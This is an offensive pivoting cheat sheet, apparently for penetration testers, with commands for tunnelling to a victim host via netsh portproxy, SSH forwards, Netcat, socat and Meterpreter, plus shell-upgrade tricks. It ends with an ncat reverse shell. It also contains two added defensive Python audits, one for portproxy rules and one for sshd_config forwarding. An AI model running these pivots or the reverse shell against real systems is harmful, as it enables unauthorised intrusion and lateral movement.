Netsh Port Forward (Windows)

pivot C:\> netsh interface portproxy add v4tov4 listenport=4000 listenaddress=0.0.0.0 connectport=22 connectaddress=victim.tgt
attacker $ ssh victimAdmin@pivot.tgt -p 4000
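A portproxy rule added with netsh is persistent: it is stored in the registry and survives reboots, so a host audit should list and review such rules. The following is an added example, not part of the cheat sheet: a Python parser for the text printed by `netsh interface portproxy show all` that flags every rule not on an allowlist, with extra notes for rules that listen on all interfaces or hand connections off to a remote-access port. The sample listing is constructed, and the allowlist and the set of "remote-access" ports are assumptions made for the demonstration.

```python
"""Flag netsh portproxy rules from `netsh interface portproxy show all`.

Added example (not from the cheat sheet). Parses the table netsh prints
and reports rules that are not on a known-good allowlist.
"""
import re

# Constructed sample of `netsh interface portproxy show all` output.
# The column layout mirrors what netsh prints; the values are invented.
SAMPLE_NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         4000        victim.tgt      22
127.0.0.1       8080        10.0.0.5        80
"""

# A data row is: listen address, listen port, connect address, connect port.
# Header lines ("Address Port ...") and separators contain no port numbers,
# so they never match.
ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")

# Assumption for this example: ports whose forwarding is worth a closer look.
REMOTE_ACCESS_PORTS = {22, 3389, 445}


def parse_portproxy(text):
    """Return a list of (listen_addr, listen_port, connect_addr, connect_port)."""
    rules = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # blank lines, section titles, column headers, separators
        listen_addr, listen_port, connect_addr, connect_port = m.groups()
        rules.append((listen_addr, int(listen_port), connect_addr, int(connect_port)))
    return rules


def suspicious_rules(rules, allowed=()):
    """Return [(rule, [reasons...])] for every rule not in the allowlist.

    `allowed` holds tuples in the same shape as parse_portproxy() returns
    (an assumed allowlist maintained by the administrator).
    """
    findings = []
    for rule in rules:
        if rule in allowed:
            continue
        listen_addr, _listen_port, _connect_addr, connect_port = rule
        reasons = ["portproxy rule not in allowlist"]
        if listen_addr == "0.0.0.0":
            reasons.append("listens on all interfaces")
        if connect_port in REMOTE_ACCESS_PORTS:
            reasons.append("forwards to remote-access port %d" % connect_port)
        findings.append((rule, reasons))
    return findings


if __name__ == "__main__":
    allowlist = {("127.0.0.1", 8080, "10.0.0.5", 80)}  # assumed known-good rule
    for rule, reasons in suspicious_rules(parse_portproxy(SAMPLE_NETSH_OUTPUT), allowlist):
        print("%s:%d -> %s:%d : %s" % (rule[0], rule[1], rule[2], rule[3], "; ".join(reasons)))
```

On a live host the same rules are also visible under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy, so a registry-change alert on that key complements the periodic listing; an empty table from `show all` together with an empty key is the expected state for a workstation that has no business forwarding ports.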
SSH through Linux:

attacker $ ssh pivotAdmin@pivot.tgt
pivot $ ssh victimAdmin@victim.tgt
PowerShell sessions through Windows:

attacker PS> Enter-PSSession -ComputerName pivot.tgt

PsExec session over Windows:

attacker C:\> psexec.exe \\pivot.tgt
Now, with command execution on pivot:

pivot $ ssh victimAdmin@victim.tgt

No SSH available? How about PuTTY?

Note that even if all the hosts in the chain run Windows, you typically can't PSSession twice because of how credentials are used. Run a search for "PSSession double hop" for more info.
Upgrade Ugly Shells

python -c 'import pty; pty.spawn("/bin/bash")'
ruby -e 'exec "/bin/sh"'
/bin/sh -i or /bin/bash -i
perl -e 'exec "/bin/sh"'
Further Upgrade Ugly Shells

Things seem off? Sometimes this can restore functionality like arrow keys in a shell:

^Z                (background the shell)
stty raw -echo
fg
reset
export SHELL=bash
export TERM=xterm-256color
stty rows 40 columns <cols>
Keep Shell Sessions Alive

screen -S hacking

Session fails? Regain the session, THEN:

screen -r hacking

Want more functionality than screen? Check out tmux.

Is your connection not stable enough for SSH? mosh is more forgiving of spotty connections.

Manage Many SSH Connections

Check out ProxyJump to manage a wide array of connections.
Purpose

Navigating a client/victim environment often requires pivoting from target to target, and there are many ways to do so. This cheat sheet runs through various options for different environments and situations.

Find a method that may fit your situation. In each, we model an attacker pivoting through pivot to reach SSH on victim. Substitute hosts and ports to fit your needs.

Pay attention to prompts, as they identify the host where the command should be run AND what type of prompt, i.e. Windows cmd.exe (C:\>), PowerShell (PS>), or Linux ($ or #). The diagram in the center should help.

Replace terms like victimAdmin and victimPass with appropriate credentials for the given system.

On the back, there are some extra goodies like how to upgrade an ugly Netcat shell to something that feels more like a real Bash shell.
Have fun, good luck, and pivot mercilessly!

SSH Pivots Require an sshd Setting

Set GatewayPorts yes in sshd_config, then:

pivot # systemctl restart sshd
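Because the remote forward depends on that GatewayPorts setting, the same keyword (together with AllowTcpForwarding and PermitTunnel) is what an administrator reviews on a host that should not be usable as a pivot. The following is an added example, not from the cheat sheet: a Python audit of sshd_config that applies sshd's own rule that the first value read for a keyword wins, skips conditional Match blocks, and reports where the effective settings differ from a forwarding-disabled baseline. The sample configuration is constructed; the "hardened" expectations are this example's assumption, while the defaults listed follow OpenSSH (AllowTcpForwarding yes, GatewayPorts no, PermitTunnel no).

```python
"""Audit sshd_config for the forwarding keywords SSH pivots rely on.

Added example (not from the cheat sheet). sshd uses the first value it
reads for a keyword, and settings inside a Match block apply only when
the match conditions hold, so this parser mirrors both behaviours.
"""

# OpenSSH defaults for the keywords of interest (lowercased, as sshd
# treats keywords case-insensitively).
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permittunnel": "no",
}

# Assumed baseline for a host that must not act as a pivot.
HARDENED = {
    "allowtcpforwarding": "no",
    "gatewayports": "no",
    "permittunnel": "no",
}

# Constructed sample sshd_config for a pivot host.
SAMPLE_SSHD_CONFIG = """
# constructed example config
Port 22
GatewayPorts yes
AllowTcpForwarding yes
GatewayPorts no           # ignored: sshd keeps the first value above
Match User backup
    AllowTcpForwarding no   # conditional, does not change the global value
"""


def parse_sshd_config(text):
    """Return the effective global settings as {keyword: value}.

    Starts from DEFAULTS, keeps only the first value seen for each
    keyword, and ignores everything from the first Match line onward
    (Match blocks run to the next Match or end of file).
    """
    settings = dict(DEFAULTS)
    seen = set()
    in_match = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        # sshd accepts "Keyword value" and "Keyword=value".
        parts = line.replace("=", " ", 1).split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            in_match = True
            continue
        if in_match or key in seen:
            continue
        seen.add(key)
        settings[key] = value
    return settings


def forwarding_findings(settings):
    """List the keywords whose effective value differs from HARDENED."""
    findings = []
    for key, want in HARDENED.items():
        have = settings.get(key, DEFAULTS[key]).lower()
        if have != want:
            findings.append("%s is %s (expected %s)" % (key, have, want))
    return findings


if __name__ == "__main__":
    for finding in forwarding_findings(parse_sshd_config(SAMPLE_SSHD_CONFIG)):
        print(finding)
```

One caveat when acting on the findings: AllowTcpForwarding no only stops sshd from doing the forwarding itself. A user who still gets a shell can run socat or Netcat exactly as this sheet shows, so the setting is a hurdle rather than a boundary unless shell access is restricted as well (ForceCommand or a restricted shell for forwarding-only accounts).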
SSH Local Port Forward

attacker $ ssh -fNL 1337:victim.tgt:22 pivotAdmin@pivot.tgt
attacker $ ssh victimAdmin@localhost -p 1337
SSH Remote Port Forward

pivot $ ssh -fNR 1337:victim.tgt:22 attacker@attacker.tgt
attacker $ ssh victimAdmin@localhost -p 1337
SSH Dynamic Port Forward (SOCKS)

attacker $ ssh pivotAdmin@pivot.tgt -D 9050 -fN
attacker $ proxychains ssh victimAdmin@victim.tgt

And check /etc/proxychains.conf for the proxy settings.
SSH flags used above:

-f       put ssh in the background after connecting
-N       don't execute a command; just forward some ports
-p num   use "num" port for ssh
Situation

You need to access SSH on port 22 of victim, but you can't go directly due to those meddling firewalls. For simplicity, this sheet will generally be using ports 1337, 4000, and 22 on the Attacker, Pivot, and Victim machines.

[Diagram: attacker.tgt -> pivot.tgt -> victim.tgt]
Netcat Port Forward

pivot $ cd /tmp && mknod backpipe p
pivot $ nc -lvp 4000 0<backpipe | nc -v victim.tgt 22 1>backpipe
attacker $ ssh victimAdmin@pivot.tgt -p 4000
Meterpreter Port Forward

pivot meterpreter > portfwd add -l 4000 -p 22 -r victim.tgt
attacker $ ssh victimAdmin@pivot.tgt -p 4000
Meterpreter Autoroute

pivot meterpreter > run post/multi/manage/autoroute SUBNET=pivotSubnet CMD=add
pivot meterpreter > background
pivot msf > use auxiliary/scanner/ssh/ssh_login
pivot msf > set RHOSTS victim.tgt
pivot msf > set USERNAME victimAdmin
pivot msf > set PASSWORD victimPass
Socat Port Forward

pivot $ socat TCP-LISTEN:4000,fork TCP:victim.tgt:22
attacker $ ssh victimAdmin@pivot.tgt -p 4000
Netcat Reverse Shell

Assumes code execution on victim.

pivot $ ncat -lvp 4000
victim $ ncat pivot.tgt 4000 -e /bin/bash